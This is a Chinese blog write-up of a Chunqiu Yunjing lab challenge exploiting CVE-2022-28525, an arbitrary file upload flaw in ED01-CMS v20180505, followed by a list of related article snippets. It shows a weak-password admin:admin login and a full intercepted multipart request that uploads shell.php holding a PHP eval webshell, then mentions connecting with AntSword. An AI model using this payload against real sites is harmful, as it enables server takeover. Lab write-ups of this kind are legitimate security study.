【春秋云境】CVE-2022-28525

最新推荐文章于 2024-10-05 22:31:58 发布
原创 最新推荐文章于 2024-10-05 22:31:58 发布 · 2.9k 阅读 · 0 ·
CC 4.0 BY-SA版权
ZXW-NUDT
文章标签:

#web安全

该文章描述了如何利用ED01-CMS的一个版本存在的任意文件上传漏洞进行攻击。作者首先通过尝试弱密码admin:admin登录,然后在用户编辑界面上传图片时,抓包修改请求,将文件名改为shell.php,内容包含PHP的执行代码,最终实现代码执行。利用成功后,使用蚁剑进行进一步操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶标介绍:

​ ED01-CMS v20180505 存在任意文件上传漏洞

打开靶场:
在这里插入图片描述
盲猜一波弱密码admin:admin就进去了。登录后在图中位置点击进行图片更新,需要将密码等都写上

在这里插入图片描述
在这里插入图片描述
抓包将图片信息进行替换,并修改文件名:

POST /admin/users.php?source=edit_user&id=41 HTTP/1.1
Host: eci-2zeg2tuyogpxmwm9b9op.cloudeci1.ichunqiu.com
Content-Length: 1347
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2zeg2tuyogpxmwm9b9op.cloudeci1.ichunqiu.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytvURtujfCTmeOmyA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.69
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2zeg2tuyogpxmwm9b9op.cloudeci1.ichunqiu.com/admin/users.php?source=edit_user&id=41
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=opuds1itmvgqublp4qr0mivo76
Connection: close

------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_id"

41
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_uname"

admin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_email"

admin@aaa.com
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_pass1"

admin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_pass2"

admin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_fname"

admin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_lname"

admin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_image"

new
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="new_image"; filename="shell.php"
Content-Type: image/jpeg

<?php @eval($_POST[cnm]);?>
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_role"

Administrator
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="user_status"

Active
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; name="updateusersubmit"


------WebKitFormBoundarytvURtujfCTmeOmyA--

最后找到图片位置,上蚁剑。

ED01-CMS 代码问题漏洞CVE-2022-28525
千寻的博客
11-27 1282
ED01-CMS v20180505 存在任意文件上传漏洞
春秋.com】CVE-2022-32991通关思路
BG_ONE的博客
12-04 1190
春秋.com】CVE-2022-32991思路
春秋CVE-2022-28525
一只爱吃橙子的羊
11-29 2511
ED01-CMS v20180505 存在任意文件上传漏洞
CVE-2022-28525
qq_63928796的博客
10-28 1391
ED01-CMS v20180505 存在任意文件上传漏洞。首先用弱口admin admin 登录网站后台。在user处找到上传webshell的地方。
CVE-2022-28525 春秋
biejianghua的博客
11-28 653
CVE-2022-28525
春秋镜靶场之CVE-2022-28525
最新发布
qq_58091216的博客
10-05 506
我们开启环可以看到题目提示我们是文件上传漏洞,那么我们就进行测试。
春秋 CVE-2022-4230 夺旗
05-02
### 春秋 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
2022年,Spring Framework 发现了一个严重的远程命令执行(RCE)漏洞,被称为CVE-2022-22965,也被称为“Spring4Shell”。这个漏洞对使用Spring Framework的应用程序构成了重大威胁,因为攻击者可以利用它来执行...
春秋CVE-2023-51048 闪灵S-CMS v5.0 后台SQL注入漏洞
HMX404的博客
04-17 1161
S-CMS v5.0 被发现存在SQLI。
Apache commons-text和Configuration 命令执行CVE-2022-42889/CVE-2022-33980分析
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
10-15 2461
Apache commons-text/Configuration 命令执行CVE-2022-42889、CVE-2022-33980分析
春秋靶场CVE-2022-28525
qq_52923396的博客
07-06 362
CVE-2022-28525ED01-CMS v20180505 存在任意文件上传漏洞)4、点击edit,进行编辑,填写password,并上传文件,使用burpsuit抓包。在users/view all users 找到上传页面,6、审查图片元素发现文件路径在/images/ 路径下。3、因为是任意文件上传漏洞,在各页面查找上传接口。2、尝试弱口令admin/admin登录。test.php内容如下。
春秋镜】CVE-2022-28525 ED01CMSv20180505存在任意文件上传漏洞 解题思路
Dark-Specter的博客
03-29 2027
文件上传漏洞是网络安全中常见的一种漏洞类型,它存在于那些处理用户上传文件请求的应用程序中。这种漏洞通常发生在应用程序未能正确验证或限制用户上传的文件类型、大小或内容时,导致攻击者能够上传恶意文件,如后门程序、木马病毒或其他恶意脚本,从而对服务器或其他用户产生安全威胁。
春秋CVE-2022-28525 (文件上传漏洞)
m0_65712192的博客
04-19 1921
ED01-CMS v20180505 存在任意文件上传漏洞
ED01-CMS v20180505 (CVE-2022-28525)
qq_45092459的博客
11-26 666
ED01-CMS v20180505(CVE-2022-28525)
ED01-CMS v20180505 文件上传漏洞CVE-2022-28525
Flag少侠的博客
07-02 9873
CVE-2022-28525 是一个影响 ED01-CMS v20180505 版本的任意文件上传漏洞。该漏洞位于,攻击者可以利用该漏洞在未经授权的情况下上传任意文件到服务器上,从而可能导致远程代码执行(RCE)​ ()​​ ()​。漏洞的主要问题是上传功能对上传文件的类型检查不足,允许上传包含恶意代码的文件。在实际利用过程中,攻击者可以上传一个包含 PHP 代码的文件,例如shell.php,然后通过访问该文件来执行任意代码​ ()​​ ()​。
春秋CVE-2022-28525
m0_64432806的博客
03-18 738
CVE-2022-28525 ED01-CMS v20180505 存在任意文件上传漏洞
春秋CVE-2022-29464
09-05
春秋CVE-2022-29464是指WSO2 API Manager 文件上传漏洞CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值